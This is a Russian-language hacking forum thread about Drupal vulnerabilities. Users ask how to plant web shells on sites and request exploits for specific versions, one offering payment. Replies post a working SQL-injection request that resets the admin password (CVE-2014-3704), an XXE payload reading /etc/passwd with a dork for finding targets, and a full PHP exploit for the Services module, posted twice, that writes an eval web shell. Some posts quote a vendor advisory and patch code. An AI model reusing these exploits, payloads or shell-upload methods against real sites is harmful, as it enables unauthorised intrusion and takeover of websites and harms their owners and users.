[ Обзор Уязвимостей .:Drupal :. ]

Discussion in 'Веб-уязвимости' started by Cawabunga, 23 Feb 2008.

  1. Hapk

    Hapk Banned

    Joined:
    3 Jun 2011
    Messages:
    329
    Likes Received:
    42
    Reputations:
    -5
    подскажите как залить шелл в вот эту версию Drupal 6.22
    доступ админки есть
    стандартные способы не помогли
     
  2. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    890
    Reputations:
    363
    CVE-2014-3704 Drupal 7.0 – 7.31 pre-auth SQL Injection Vulnerability

    lol
    https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html

    Code:
                            SektionEins GmbH
                            www.sektioneins.de
    
                         -= Security  Advisory =-
    
         Advisory: Drupal - pre-auth SQL Injection Vulnerability
     Release Date: 2014/10/15
    Last Modified: 2014/10/15
           Author: Stefan Horst [stefan.horst[at]sektioneins.de]
    
      Application: Drupal >= 7.0 <= 7.31
         Severity: Full SQL injection, which results in total control and code execution of Website.
             Risk: Highly Critical
    Vendor Status: Drupal 7.32 fixed this bug
        Reference: http://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
    
    Overview:
    
      Quote from http://www.drupal.org
      "Come for the software, stay for the community
    
       Drupal is an open source content management platform powering millions
       of websites and applications. It’s built, used, and supported by an
       active and diverse community of people around the world."
    
      During a code audit of Drupal extensions for a customer an SQL Injection
          was found in the way the Drupal core handles prepared statements.
    
      A malicious user can inject arbitrary SQL queries. And thereby
      control the complete Drupal site. This leads to a code execution as well.
    
          This vulnerability can be exploited by remote attackers without any
          kind of authentication required.
    
    Details:
    
      Drupal uses prepared statements in all its SQL queries. To handle IN
      statements there is an expandArguments function to expand arrays.
    
        protected function expandArguments(&$query, &$args) {
          $modified = FALSE;
    
          // If the placeholder value to insert is an array, assume that we need
          // to expand it out into a comma-delimited set of placeholders.
          foreach (array_filter($args, 'is_array') as $key => $data) {
            $new_keys = array();
            foreach ($data as $i => $value) {
              // This assumes that there are no other placeholders that use the same
              // name.  For example, if the array placeholder is defined as :example
              // and there is already an :example_2 placeholder, this will generate
              // a duplicate key.  We do not account for that as the calling code
              // is already broken if that happens.
              $new_keys[$key . '_' . $i] = $value;
            }
    
            // Update the query with the new placeholders.
            // preg_replace is necessary to ensure the replacement does not affect
            // placeholders that start with the same exact text. For example, if the
            // query contains the placeholders :foo and :foobar, and :foo has an
            // array of values, using str_replace would affect both placeholders,
            // but using the following preg_replace would only affect :foo because
            // it is followed by a non-word character.
            $query = preg_replace('#' . $key . '\b#', implode(', ', array_keys($new_keys)), $query);
    
            // Update the args array with the new placeholders.
            unset($args[$key]);
            $args += $new_keys;
    
            $modified = TRUE;
          }
    
          return $modified;
        }
    
      The function assumes that it is called with an array which has no keys. Example:
    
        db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('user1','user2')));
    
      Which results in this SQL Statement
    
        SELECT * from users where name IN (:name_0, :name_1)
    
      with the parameters name_0 = user1 and name_1 = user2.
    
      The Problem occurs, if the array has keys, which are no integers. Example:
    
        db_query("SELECT * FROM {users} where name IN (:name)", array(':name'=>array('test -- ' => 'user1','test' => 'user2')));
    
      this results in an exploitable SQL query:
    
         SELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1
    
      with parameters :name_test = user2.
    
      Since Drupal uses PDO, multi-queries are allowed. So this SQL Injection can
          be used to insert arbitrary data in the database, dump or modify existing data
          or drop the whole database.
    
      With the possibility to INSERT arbitrary data into the database an
      attacker can execute any PHP code through Drupal features with callbacks.
    
    Patch:
    
        $new_keys = array();
        foreach (array_values($data) as $i => $value) {
          // This assumes that there are no other placeholders that use the same
          // name.  For example, if the array placeholder is defined as :example
          // and there is already an :example_2 placeholder, this will generate
          // a duplicate key.  We do not account for that as the calling code
          // is already broken if that happens.
          $new_keys[$key . '_' . $i] = $value;
        }
    
    Proof of Concept:
    
      SektionEins GmbH has developed a proof of concept, but was asked by
      Drupal to postpone the release.
    
    Disclosure Timeline:
    
      16. Sep.  2014 - Notified the Drupal devs via security contact form
      15. Okt.  2014 - Relase of Bugfix by Drupal core Developers
    poc:
    Code:
    name[0%20;update+users+set+name%3d'owned'+,+pass+%3d+'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld'+where+uid+%3d+'1';;#%20%20]=test3&name[0]=test&pass=shit2&test2=test&form_build_id=&form_id=user_login_block&op=Log+in
    и работает ведь

    вперед хэкеры
    exploit:
    http://pastebin.com/nDwLFV3v
    video: http://www.youtube.com/watch?v=rHwJYD_yTlM
     
    _________________________
    #22 yarbabin, 16 Oct 2014
    Last edited: 16 Oct 2014
  3. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    916
    Likes Received:
    461
    Reputations:
    722
    _________________________
  4. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    916
    Likes Received:
    461
    Reputations:
    722
    Open redirect и обход авторизации. В плане эксплуатации имеются серьезные ограничения.
    https://www.drupal.org/SA-CORE-2015-001

    Байпас (modules/user/user.module)
    До
    PHP:
    function user_pass_rehash($password$timestamp$login) {
      return 
    md5($timestamp $password $login);
    }
    После
    PHP:
    function user_pass_rehash($password$timestamp$login$uid) {
      
    // Backwards compatibility: Try to determine a $uid if one was not passed.
      // (Since $uid is a required parameter to this function, a PHP warning will
      // be generated if it's not provided, which is an indication that the calling
      // code should be updated. But the code below will try to generate a correct
      // hash in the meantime.)
      
    if (!isset($uid)) {
        
    $uids = array();
        
    $result db_query_range("SELECT uid FROM {users} WHERE pass = '%s' AND login = '%s' AND uid > 0"$password$login02);
        while (
    $row db_fetch_array($result)) {
          
    $uids[] = $row['uid'];
        }
        
    // If exactly one user account matches the provided password and login
        // timestamp, proceed with that $uid.
        
    if (count($uids) == 1) {
          
    $uid reset($uids);
        }
        
    // Otherwise there is no safe hash to return, so return a random string
        // that will never be treated as a valid token.
        
    else {
          return 
    drupal_random_key();
        }
      }
      return 
    drupal_hmac_base64($timestamp $login $uiddrupal_get_private_key() . $password);
    }
    ORed (includes/bootstrap.inc)
    PHP:
    // Sanitize the destination parameter (which is often used for redirects)
          // to prevent open redirect attacks leading to other domains. Sanitize
          // both $_GET['destination'] and $_REQUEST['destination'] to protect code
          // that relies on either, but do not sanitize $_POST to avoid interfering
          // with unrelated form submissions. $_REQUEST['edit']['destination'] is
          // also sanitized since drupal_goto() will sometimes rely on it, and
          // other code might therefore use it too. The sanitization happens here
          // because menu_path_is_external() requires the variable system to be
          // available.
          
    if (isset($_GET['destination']) || isset($_REQUEST['destination']) || isset($_REQUEST['edit']['destination'])) {
            require_once 
    './includes/menu.inc';
            
    drupal_load('module''filter');
            
    // If the destination is an external URL, remove it.
            
    if (isset($_GET['destination']) && menu_path_is_external($_GET['destination'])) {
              unset(
    $_GET['destination']);
              unset(
    $_REQUEST['destination']);
            }
            
    // If there's still something in $_REQUEST['destination'] that didn't
            // come from $_GET, check it too.
            
    if (isset($_REQUEST['destination']) && (!isset($_GET['destination']) || $_REQUEST['destination'] != $_GET['destination']) && menu_path_is_external($_REQUEST['destination'])) {
              unset(
    $_REQUEST['destination']);
            }
            
    // Check $_REQUEST['edit']['destination'] separately.
            
    if (isset($_REQUEST['edit']['destination']) && menu_path_is_external($_REQUEST['edit']['destination'])) {
              unset(
    $_REQUEST['edit']['destination']);
            }
          }
     
    _________________________
    3 people like this.
  5. VY_CMa

    VY_CMa Green member

    Joined:
    6 Jan 2012
    Messages:
    916
    Likes Received:
    461
    Reputations:
    722
    Pre-auth XXE in Drupal Services module, neat tricks to bypass restrictions inside
    Подробное описание (PDF): http://www.synacktiv.fr/ressources/synacktiv_drupal_xxe_services.pdf
    Code:
    POST /drupal7.28/?q=test/node HTTP/1.1
    [...]
    <!DOCTYPE root [
    <!ENTITY % evil SYSTEM "file:///etc/passwd">
    %evil;
    ]>
    <xml>
            <test>test</test>
    </xml>
    ДОРК: "inurl:sites/all/modules/services/servers/rest_server/"
     
    _________________________
    BioRenGen, palec2006 and yarbabin like this.
  6. embarg0

    embarg0 New Member

    Joined:
    5 Oct 2015
    Messages:
    25
    Likes Received:
    1
    Reputations:
    0
    Кто подскажет насчет 7,37 версии? может у когото есть сплоит?
     
  7. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    6.36 есть чем ковырнуть ?
     
  8. vikler

    vikler Member

    Joined:
    16 Aug 2012
    Messages:
    96
    Likes Received:
    7
    Reputations:
    0
    Всем привет
    drupal 6.20. Аккаунт с правами администратора
    Стандартные способы заливки шелла не помогают :( Кто что ещё подскажет?Что пробовала
    1) В модулях включила PHP filter
    2) По site/admin/settings/filters/ => Access denied You are not authorized to access this page.
    А значит, уже не получится включить формат php, и соответственно при добавлении блоков или страниц нельзя выбрать формат php... Этот способ облом
    3) Темы загружать не могу
    4) есть imce. Загружаю php => переименовывается в php_.txt. Загружаю .php3 => скачивается
    Загружаю .shtml - нормально открывается, но видна только html'ная часть, php код не исполняется, всё интерпретируется как html.
    5) пыталась загрузить опять же через imce .htaccess чтобы не скачивались файлы php3. Но облом, переименовывается в htaccess.

    В общем, не знаю, что ещё делать

    Кто что подскажет?
     
  9. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,960
    Likes Received:
    1,219
    Reputations:
    704
    DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE

    Уязвимость
    Одной из особенностей модуля является то, что можно управлять форматом ввода / вывода, изменяя заголовки Content-Type / Accept. По умолчанию разрешены следующие форматы ввода:

    Application / xml
    Application / json
    Multipart / form-data
    Application / vnd.php.serialized


    Code:
    POST /drupal-7.54/my_rest_endpoint/user/login HTTP/1.1
    Host: vmweb.lan
    Accept: application/json
    Content-Type: application/vnd.php.serialized
    Content-Length: 45
    Connection: close
    
    a:2:{s:8:"username";s:5:"admin";s:8:"password";s:8:"password";}

    Code:
    HTTP/1.1 200 OK
    Date: Thu, 02 Mar 2017 14:29:54 GMT
    Server: Apache/2.4.18 (Ubuntu)
    Expires: Sun, 19 Nov 1978 05:00:00 GMT
    Cache-Control: no-cache, must-revalidate
    X-Content-Type-Options: nosniff
    Vary: Accept
    Set-Cookie: SESSaad41d4de9fd30ccb65f8ea9e4162d52=ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I; expires=Sat, 25-Mar-2017 18:03:14 GMT; Max-Age=2000000; path=/; domain=.vmweb.lan; HttpOnly
    Content-Length: 635
    Connection: close
    Content-Type: application/json
    
    {"sessid":"ufBRP7UJFuQKSf0VuFvwaoB3h4mjVYXbE9K6Y_DGU_I","session_name":"SESSaad41d4de9fd30ccb65f8ea9e4162d52","token":"2tFysvDt1POl7jjJJSCRO7sL1rvlrnqtrik6gljggo4","user":{"uid":"1","name":"admin","mail":"admin@vmweb.lan","theme":"","signature":"","signature_format":null,"created":"1487348324","access":"1488464867","login":1488464994,"status":"1","timezone":"Europe/Berlin","language":"","picture":null,"init":"admin@vmweb.lan","data":false,"roles":{"2":"authenticated user","3":"administrator"},"rdf_mapping":{"rdftype":["sioc:UserAccount"],"name":{"predicates":["foaf:name"]},"homepage":{"predicates":["foaf:page"],"type":"rel"}}}}

    Exploit:

    PHP:
    #!/usr/bin/php
    <?php
    # Drupal Services Module Remote Code Execution Exploit
    # https://www.ambionics.io/blog/drupal-services-module-rce
    # cf
    #
    # Three stages:
    # 1. Use the SQL Injection to get the contents of the cache for current endpoint
    #    along with admin credentials and hash
    # 2. Alter the cache to allow us to write a file and do so
    # 3. Restore the cache
    #

    # Initialization

    error_reporting(E_ALL);

    define('QID''anything');
    define('TYPE_PHP''application/vnd.php.serialized');
    define('TYPE_JSON''application/json');
    define('CONTROLLER''user');
    define('ACTION''login');

    $url 'http://vmweb.lan/drupal-7.54';
    $endpoint_path '/rest_endpoint';
    $endpoint 'rest_endpoint';

    $file = [
        
    'filename' => 'dixuSOspsOUU.php',
        
    'data' => '<?php eval(file_get_contents(\'php://input\')); ?>'
    ];

    $browser = new Browser($url $endpoint_path);


    # Stage 1: SQL Injection

    class DatabaseCondition
    {
        protected 
    $conditions = [
            
    "#conjunction" => "AND"
        
    ];
        protected 
    $arguments = [];
        protected 
    $changed false;
        protected 
    $queryPlaceholderIdentifier null;
        public 
    $stringVersion null;

        public function 
    __construct($stringVersion=null)
        {
            
    $this->stringVersion $stringVersion;

            if(!isset(
    $stringVersion))
            {
                
    $this->changed true;
                
    $this->stringVersion null;
            }
        }
    }

    class 
    SelectQueryExtender {
        
    # Contains a DatabaseCondition object instead of a SelectQueryInterface
        # so that $query->compile() exists and (string) $query is controlled by us.
        
    protected $query null;

        protected 
    $uniqueIdentifier QID;
        protected 
    $connection;
        protected 
    $placeholder 0;

        public function 
    __construct($sql)
        {
            
    $this->query = new DatabaseCondition($sql);
        }
    }

    $cache_id "services:$endpoint:resources";
    $sql_cache "SELECT data FROM {cache} WHERE cid='$cache_id'";
    $password_hash '$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd';

    # Take first user but with a custom password
    # Store the original password hash in signature_format, and endpoint cache
    # in signature
    $query =
        
    "0x3a) UNION SELECT ux.uid AS uid, " .
        
    "ux.name AS name, '$password_hash' AS pass, " .
        
    "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
        
    "ux.pass AS signature_format, ux.created AS created, " .
        
    "ux.access AS access, ux.login AS login, ux.status AS status, " .
        
    "ux.timezone AS timezone, ux.language AS language, ux.picture " .
        
    "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
        
    "WHERE ux.uid<>(0"
    ;

    $query = new SelectQueryExtender($query);
    $data = ['username' => $query'password' => 'ouvreboite'];
    $data serialize($data);

    $json $browser->post(TYPE_PHP$data);

    # If this worked, the rest will as well
    if(!isset($json->user))
    {
        
    print_r($json);
        
    e("Failed to login with fake password");
    }

    # Store session and user data

    $session = [
        
    'session_name' => $json->session_name,
        
    'session_id' => $json->sessid,
        
    'token' => $json->token
    ];
    store('session'$session);

    $user $json->user;

    # Unserialize the cached value
    # Note: Drupal websites admins, this is your opportunity to fight back :)
    $cache unserialize($user->signature);

    # Reassign fields
    $user->pass $user->signature_format;
    unset(
    $user->signature);
    unset(
    $user->signature_format);

    store('user'$user);

    if(
    $cache === false)
    {
        
    e("Unable to obtains endpoint's cache value");
    }

    x("Cache contains " sizeof($cache) . " entries");

    # Stage 2: Change endpoint's behaviour to write a shell

    class DrupalCacheArray
    {
        
    # Cache ID
        
    protected $cid "services:endpoint_name:resources";
        
    # Name of the table to fetch data from.
        # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
        
    protected $bin 'cache';
        protected 
    $keysToPersist = [];
        protected 
    $storage = [];

        function 
    __construct($storage$endpoint$controller$action) {
            
    $settings = [
                
    'services' => ['resource_api_version' => '1.0']
            ];
            
    $this->cid "services:$endpoint:resources";

            
    # If no endpoint is given, just reset the original values
            
    if(isset($controller))
            {
                
    $storage[$controller]['actions'][$action] = [
                    
    'help' => 'Writes data to a file',
                    
    # Callback function
                    
    'callback' => 'file_put_contents',
                    
    # This one does not accept "true" as Drupal does,
                    # so we just go for a tautology
                    
    'access callback' => 'is_string',
                    
    'access arguments' => ['a string'],
                    
    # Arguments given through POST
                    
    'args' => [
                        
    => [
                            
    'name' => 'filename',
                            
    'type' => 'string',
                            
    'description' => 'Path to the file',
                            
    'source' => ['data' => 'filename'],
                            
    'optional' => false,
                        ],
                        
    => [
                            
    'name' => 'data',
                            
    'type' => 'string',
                            
    'description' => 'The data to write',
                            
    'source' => ['data' => 'data'],
                            
    'optional' => false,
                        ],
                    ],
                    
    'file' => [
                        
    'type' => 'inc',
                        
    'module' => 'services',
                        
    'name' => 'resources/user_resource',
                    ],
                    
    'endpoint' => $settings
                
    ];
                
    $storage[$controller]['endpoint']['actions'] += [
                    
    $action => [
                        
    'enabled' => 1,
                        
    'settings' => $settings
                    
    ]
                ];
            }

            
    $this->storage $storage;
            
    $this->keysToPersist array_fill_keys(array_keys($storage), true);
        }
    }

    class 
    ThemeRegistry Extends DrupalCacheArray {
        protected 
    $persistable;
        protected 
    $completeRegistry;
    }

    cache_poison($endpoint$cache);

    # Write the file
    $json = (array) $browser->post(TYPE_JSONjson_encode($file));


    # Stage 3: Restore endpoint's behaviour

    cache_reset($endpoint$cache);

    if(!(isset(
    $json[0]) && $json[0] === strlen($file['data'])))
    {
        
    e("Failed to write file.");
    }

    $file_url $url '/' $file['filename'];
    x("File written: $file_url");


    # HTTP Browser

    class Browser
    {
        private 
    $url;
        private 
    $controller CONTROLLER;
        private 
    $action ACTION;

        function 
    __construct($url)
        {
            
    $this->url $url;
        }

        function 
    post($type$data)
        {
            
    $headers = [
                
    "Accept: " TYPE_JSON,
                
    "Content-Type: $type",
                
    "Content-Length: " strlen($data)
            ];
            
    $url $this->url '/' $this->controller '/' $this->action;

            
    $s curl_init();
            
    curl_setopt($sCURLOPT_URL$url);
            
    curl_setopt($sCURLOPT_HTTPHEADER$headers);
            
    curl_setopt($sCURLOPT_POST1);
            
    curl_setopt($sCURLOPT_POSTFIELDS$data);
            
    curl_setopt($sCURLOPT_RETURNTRANSFERtrue);
            
    curl_setopt($sCURLOPT_SSL_VERIFYHOST0);
            
    curl_setopt($sCURLOPT_SSL_VERIFYPEER0);
            
    $output curl_exec($s);
            
    $error curl_error($s);
            
    curl_close($s);

            if(
    $error)
            {
                
    e("cURL: $error");
            }

            return 
    json_decode($output);
        }
    }

    # Cache

    function cache_poison($endpoint$cache)
    {
        
    $tr = new ThemeRegistry($cache$endpointCONTROLLERACTION);
        
    cache_edit($tr);
    }

    function 
    cache_reset($endpoint$cache)
    {
        
    $tr = new ThemeRegistry($cache$endpointnullnull);
        
    cache_edit($tr);
    }

    function 
    cache_edit($tr)
    {
        global 
    $browser;
        
    $data serialize([$tr]);
        
    $json $browser->post(TYPE_PHP$data);
    }

    # Utils

    function x($message)
    {
        print(
    "$message\n");
    }

    function 
    e($message)
    {
        
    x($message);
        exit(
    1);
    }

    function 
    store($name$data)
    {
        
    $filename "$name.json";
        
    file_put_contents($filenamejson_encode($dataJSON_PRETTY_PRINT));
        
    x("Stored $name information in $filename");
    }


    Всем срочно обновляться =)


    Источник : Здесь
     
    BioRenGen, PoliGroS and Gorev like this.
  10. grimnir

    grimnir Reservists Of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,116
    Likes Received:
    765
    Reputations:
    200
    Drupal 7.x Services Module Remote Code Execution
    Code:
    #!/usr/bin/php
    
    <?php
    # Drupal Services Module Remote Code Execution Exploit
    # https://www.ambionics.io/blog/drupal-services-module-rce
    # cf
    #
    # Three stages:
    # 1. Use the SQL Injection to get the contents of the cache for current
    endpoint
    #    along with admin credentials and hash
    # 2. Alter the cache to allow us to write a file and do so
    # 3. Restore the cache
    #
    # Initialization
    error_reporting(E_ALL);
    define(''QID'', ''anything'');
    define(''TYPE_PHP'', ''application/vnd.php.serialized'');
    define(''TYPE_JSON'', ''application/json'');
    define(''CONTROLLER'', ''user'');
    define(''ACTION'', ''login'');
    $url = ''http://vmweb.lan/drupal-7.54'';
    $endpoint_path = ''/rest_endpoint'';
    $endpoint = ''rest_endpoint'';
    $file = [
        ''filename'' => ''dixuSOspsOUU.php'',
        ''data'' => ''<?php eval(file_get_contents(\''php://input\'')); ?>''
    ];
    $browser = new Browser($url . $endpoint_path);
    # Stage 1: SQL Injection
    class DatabaseCondition
    {
        protected $conditions = [
            "#conjunction" => "AND"
        ];
        protected $arguments = [];
        protected $changed = false;
        protected $queryPlaceholderIdentifier = null;
        public $stringVersion = null;
        public function __construct($stringVersion=null)
        {
            $this->stringVersion = $stringVersion;
            if(!isset($stringVersion))
            {
                $this->changed = true;
                $this->stringVersion = null;
            }
        }
    }
    class SelectQueryExtender {
        # Contains a DatabaseCondition object instead of a SelectQueryInterface
        # so that $query->compile() exists and (string) $query is controlled by
    us.
        protected $query = null;
        protected $uniqueIdentifier = QID;
        protected $connection;
        protected $placeholder = 0;
        public function __construct($sql)
        {
            $this->query = new DatabaseCondition($sql);
        }
    }
    $cache_id = "services:$endpoint:resources";
    $sql_cache = "SELECT data FROM {cache} WHERE cid=''$cache_id''";
    $password_hash = ''$S$D2NH.6IZNb1vbZEV1F0S9fqIz3A0Y1xueKznB8vWrMsnV/nrTpnd'';
    # Take first user but with a custom password
    # Store the original password hash in signature_format, and endpoint cache
    # in signature
    $query =
        "0x3a) UNION SELECT ux.uid AS uid, " .
        "ux.name AS name, ''$password_hash'' AS pass, " .
        "ux.mail AS mail, ux.theme AS theme, ($sql_cache) AS signature, " .
        "ux.pass AS signature_format, ux.created AS created, " .
        "ux.access AS access, ux.login AS login, ux.status AS status, " .
        "ux.timezone AS timezone, ux.language AS language, ux.picture " .
        "AS picture, ux.init AS init, ux.data AS data FROM {users} ux " .
        "WHERE ux.uid<>(0"
    ;
    $query = new SelectQueryExtender($query);
    $data = [''username'' => $query, ''password'' => ''ouvreboite''];
    $data = serialize($data);
    $json = $browser->post(TYPE_PHP, $data);
    # If this worked, the rest will as well
    if(!isset($json->user))
    {
        print_r($json);
        e("Failed to login with fake password");
    }
    # Store session and user data
    $session = [
        ''session_name'' => $json->session_name,
        ''session_id'' => $json->sessid,
        ''token'' => $json->token
    ];
    store(''session'', $session);
    $user = $json->user;
    # Unserialize the cached value
    # Note: Drupal websites admins, this is your opportunity to fight back :)
    $cache = unserialize($user->signature);
    # Reassign fields
    $user->pass = $user->signature_format;
    unset($user->signature);
    unset($user->signature_format);
    store(''user'', $user);
    if($cache === false)
    {
        e("Unable to obtains endpoint''s cache value");
    }
    x("Cache contains " . sizeof($cache) . " entries");
    # Stage 2: Change endpoint''s behaviour to write a shell
    class DrupalCacheArray
    {
        # Cache ID
        protected $cid = "services:endpoint_name:resources";
        # Name of the table to fetch data from.
        # Can also be used to SQL inject in DrupalDatabaseCache::getMultiple()
        protected $bin = ''cache'';
        protected $keysToPersist = [];
        protected $storage = [];
        function __construct($storage, $endpoint, $controller, $action) {
            $settings = [
                ''services'' => [''resource_api_version'' => ''1.0'']
            ];
            $this->cid = "services:$endpoint:resources";
            # If no endpoint is given, just reset the original values
            if(isset($controller))
            {
                $storage[$controller][''actions''][$action] = [
                    ''help'' => ''Writes data to a file'',
                    # Callback function
                    ''callback'' => ''file_put_contents'',
                    # This one does not accept "true" as Drupal does,
                    # so we just go for a tautology
                    ''access callback'' => ''is_string'',
                    ''access arguments'' => [''a string''],
                    # Arguments given through POST
                    ''args'' => [
                        0 => [
                            ''name'' => ''filename'',
                            ''type'' => ''string'',
                            ''description'' => ''Path to the file'',
                            ''source'' => [''data'' => ''filename''],
                            ''optional'' => false,
                        ],
                        1 => [
                            ''name'' => ''data'',
                            ''type'' => ''string'',
                            ''description'' => ''The data to write'',
                            ''source'' => [''data'' => ''data''],
                            ''optional'' => false,
                        ],
                    ],
                    ''file'' => [
                        ''type'' => ''inc'',
                        ''module'' => ''services'',
                        ''name'' => ''resources/user_resource'',
                    ],
                    ''endpoint'' => $settings
                ];
                $storage[$controller][''endpoint''][''actions''] += [
                    $action => [
                        ''enabled'' => 1,
                        ''settings'' => $settings
                    ]
                ];
            }
            $this->storage = $storage;
            $this->keysToPersist = array_fill_keys(array_keys($storage), true);
        }
    }
    class ThemeRegistry Extends DrupalCacheArray {
        protected $persistable;
        protected $completeRegistry;
    }
    cache_poison($endpoint, $cache);
    # Write the file
    $json = (array) $browser->post(TYPE_JSON, json_encode($file));
    # Stage 3: Restore endpoint''s behaviour
    cache_reset($endpoint, $cache);
    if(!(isset($json[0]) && $json[0] === strlen($file[''data''])))
    {
        e("Failed to write file.");
    }
    $file_url = $url . ''/'' . $file[''filename''];
    x("File written: $file_url");
    # HTTP Browser
    class Browser
    {
        private $url;
        private $controller = CONTROLLER;
        private $action = ACTION;
        function __construct($url)
        {
            $this->url = $url;
        }
        function post($type, $data)
        {
            $headers = [
                "Accept: " . TYPE_JSON,
                "Content-Type: $type",
                "Content-Length: " . strlen($data)
            ];
            $url = $this->url . ''/'' . $this->controller . ''/'' . $this->action;
            $s = curl_init();
            curl_setopt($s, CURLOPT_URL, $url);
            curl_setopt($s, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($s, CURLOPT_POST, 1);
            curl_setopt($s, CURLOPT_POSTFIELDS, $data);
            curl_setopt($s, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($s, CURLOPT_SSL_VERIFYHOST, 0);
            curl_setopt($s, CURLOPT_SSL_VERIFYPEER, 0);
            $output = curl_exec($s);
            $error = curl_error($s);
            curl_close($s);
            if($error)
            {
                e("cURL: $error");
            }
            return json_decode($output);
        }
    }
    # Cache
    function cache_poison($endpoint, $cache)
    {
        $tr = new ThemeRegistry($cache, $endpoint, CONTROLLER, ACTION);
        cache_edit($tr);
    }
    function cache_reset($endpoint, $cache)
    {
        $tr = new ThemeRegistry($cache, $endpoint, null, null);
        cache_edit($tr);
    }
    function cache_edit($tr)
    {
        global $browser;
        $data = serialize([$tr]);
        $json = $browser->post(TYPE_PHP, $data);
    }
    # Utils
    function x($message)
    {
        print("$message\n");
    }
    function e($message)
    {
        x($message);
        exit(1);
    }
    function store($name, $data)
    {
        $filename = "$name.json";
        file_put_contents($filename, json_encode($data, JSON_PRETTY_PRINT));
        x("Stored $name information in $filename");
    }
     
    _________________________
  11. karkajoi

    karkajoi Active Member

    Joined:
    26 Oct 2016
    Messages:
    279
    Likes Received:
    137
    Reputations:
    2
    Зачем 2 одинаковых поста?
     
  12. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    вечно ругается на эту строку "28" $file = [
     
  13. leokomaro

    leokomaro New Member

    Joined:
    27 Apr 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    может кто то с 6.22 помочь на возмездной основе?
     
  14. ellococareloco

    ellococareloco New Member

    Joined:
    3 Jun 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    [Quote = "leokomaro, de la publicación: 4079266, miembro de: 302606"] alguien puede ayudar con un 6,22 sobre una base reembolsable [/ quote]?
    https://cxsecurity.com/issue/WLB-2016070020

    alguien sabe otra vulnerabilidad a 6.22?
     
  15. leokomaro

    leokomaro New Member

    Joined:
    27 Apr 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    CVE-2016-3168 вот это кто нибудь может объяснить как использовать?
     
  16. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Пацаны,
    Drupal 6.28, 2013-01-16
    ----------------------
    - Fixed security issues (multiple vulnerabilities), see SA-CORE-2013-001.

    реально ли это взломать?
     
  17. salam477

    salam477 New Member

    Joined:
    29 Sep 2017
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите, возможен в друпале xmlrpc брут?
    в wp все предельно просто, делаешь xml Запрос с параметрами и все работает, а какие параметры у друпала? информация в сети очень древняя.

    Если это реально, можно пример?
     
  18. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Паблик экспа Drupalgeddon2 только при открытой реги отрабатывает?
     
  19. Gorbachev

    Gorbachev Active Member

    Joined:
    23 Mar 2017
    Messages:
    247
    Likes Received:
    114
    Reputations:
    58
    Паблик экспа Drupalgeddon2 ни в каком случае не отрабатывает, защита от дурака стоит.
     
  20. Zen1T21

    Zen1T21 Member

    Joined:
    13 Jan 2013
    Messages:
    154
    Likes Received:
    31
    Reputations:
    2
    Спасибо, кэп
     
Loading...